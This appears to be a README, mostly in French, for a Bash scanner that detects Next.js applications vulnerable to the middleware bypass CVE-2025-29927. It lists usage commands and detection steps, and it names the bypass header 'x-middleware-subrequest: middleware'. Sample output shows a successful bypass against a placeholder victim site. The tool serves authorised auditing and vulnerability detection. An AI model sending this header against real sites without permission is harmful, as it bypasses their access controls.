
CVE-2025-29927 Exploit Checker
Outil automatisé en Bash pour détecter les applications Next.js vulnérables au contournement de middleware CVE-2025-29927, selon les recherches de Zhero Web Security.
bashwhatwebcurlInstallez-les sur Debian/Ubuntu avec :
sudo apt install whatweb curl
./CVE-2025-29927.sh -u https://example.com
Créez un fichier urls.txt avec une URL par ligne :
https://target1.com
https://target2.com
Exécutez :
./nextjs_bypass_checker_v2.sh -l urls.txt
Identification de Next.js
whatweb pour détecter la technologie./_next/static/BUILD_ID et _buildManifest.js.Détection du middleware
X-Middleware-RewriteX-Middleware-Set-CookieTest de contournement
x-middleware-subrequest et les en-têtes sont détectés.[*] Analizando: https://victima.com
[+] WhatWeb:
-> Detectado: Next.js[12.2.0]
[+] BUILD_ID: 3fjd92hf8
[+] Versión detectada: 12.2.0
[+] Middleware activo (cabeceras detectadas):
X-Middleware-Rewrite: /not-found/locale=en
[+] Probando exploits:
-> x-middleware-subrequest: middleware -> ✅ BYPASS EXITOSO (cabeceras desaparecieron)
-> x-middleware-subrequest: src/middleware -> ❌ Middleware no evadido
[*] Finalizado: https://victima.com
Ce script est à des fins éducatives et d'audit autorisé. Ne l'utilisez pas contre des cibles sans consentement. Une utilisation abusive peut constituer une activité illégale.
Basé sur les recherches de : Zhero Web Security